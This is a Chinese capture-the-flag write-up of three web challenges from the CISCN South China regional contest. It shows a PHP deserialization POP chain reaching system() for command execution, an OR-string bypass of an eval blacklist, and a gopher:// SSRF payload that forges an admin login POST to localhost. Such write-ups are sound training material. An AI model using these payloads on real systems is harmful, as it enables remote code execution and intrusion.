CISCN华南赛区分区赛wp

期末考终于结束了,抓紧来整理一下这次比赛的wp

easy_seri

第一步先静态调试过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
highlight_file(__FILE__);
class Test{
public $public_key;
public $private_key;
function __wakeup(){
if($public_key !== $private_key)
{
die("You can't");
}
}
function getHint()
{
echo file_get_contents('./demo.php');
}

}

$a = $_GET['a'];
if(strpos($a,'key') !== false){
die("No!!!");
}
else
{
unserialize($a)();
}
?>
1
/?a=s:13:"Test::getHint"; gethint

看其他师傅的wp也可以16进制绕strpos,然后绕wakeup,数组执行getHint(因为unserialize后面还有个括号)

1
2
3
4
5
$test = new Test();
$test->public_key = 1;
$test->private_key = 2;
$a = [$test, 'getHint'];
echo serialize($a);

然后可以看到demo.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
class Fake{
public $firm;
public $test;
public function __set($firm,$test){
$test = "No,You can't";
$firm = unserialize($firm);
call_user_func($firm,$test);
}
}
class Temp{
public $pri;
public $fin=1;
public function __destruct()
{
$a=$this->action;
$this->pri->$a = $this->fin;
}

}

class OwO{
public $fc;
public $args;
function run()
{

return ($this->fc)($this->args);

}
}
$d = $_GET['poc'];
unserialize($d);
?>

反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php

class Fake
{
public $firm;
public $test;

public function __set($firm, $test)
{
$test = "No,You can't";
$firm = unserialize($firm);
echo $firm;
echo $test;
call_user_func($firm, $test); //OwO run

}
}

class Temp
{
public $pri;
public $fin = 1;

public function __destruct()
{
$a = $this->action;
$this->pri->$a = $this->fin;
}

}

class OwO
{
public $fc = "system";
public $args = "id";

function run()
{
return ($this->fc)($this->args);
}
}

//$a=array(new OwO,'run');
//echo serialize($a);

$a=new Temp;
$a->pri=new Fake;
$a->action='a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:2:"ls";}i:1;s:3:"run";}';
echo serialize($a)

?>

magicchar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
error_reporting(0);
include'flag.php';
function Magic($str){
for($i=0; $i<=strlen($str)-1; $i++) {
if ((ord($str[$i])<32) or (ord($str[$i])>126)) {
die('sorry');
exit;
}
}
$blklst = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];
foreach ($blklst as $blkitem) {
if (preg_match('/' . $blkitem . '/m', $str)) {
die('out');
exit;
}
}
}
if(!isset($_GET['yell'])) {
show_source(__FILE__);
} else {
$str = $_GET['yell'];
Magic($str);
ob_start();
$res = eval("echo " . $str . ";");
$out = ob_get_contents();
ob_end_clean();
if ($out === "Wa4nn") {
echo $flag;
} else {
echo htmlspecialchars($out, ENT_QUOTES);
}
}
?>

套路题

字符串或

1
?yell=%22W%22.(%22@%22|%22!%22).%224%22.(%22@%22|%22.%22).(%22@%22|%22.%22)

really_admin

第一步根据提示直接md5过

admin/129581926211651571912466741651878684928

进来之后根据提示去ssrf.php

看到这个熟悉的界面加上上面的慢慢做管理系统的标题

CISCN%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E5%88%86%E5%8C%BA%E8%B5%9Bwp%20f1f334862d914c13a0934a194b3ea0be/Untitled%201.png

破案了hfctf原题

直接翻出之前打hfctf的wp,直接打

1
http://172.35.16.17/ssrf.php?way=gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252056%250A%250Ausername%253Dadmin%2526password%253D5fb4e07de914cfc82afb44vbaf402203%250A

CISCN%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E5%88%86%E5%8C%BA%E8%B5%9Bwp%20f1f334862d914c13a0934a194b3ea0be/Untitled%202.png

把cookie保存下来,然后改之后访问flag.php

CISCN%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E5%88%86%E5%8C%BA%E8%B5%9Bwp%20f1f334862d914c13a0934a194b3ea0be/Untitled%203.png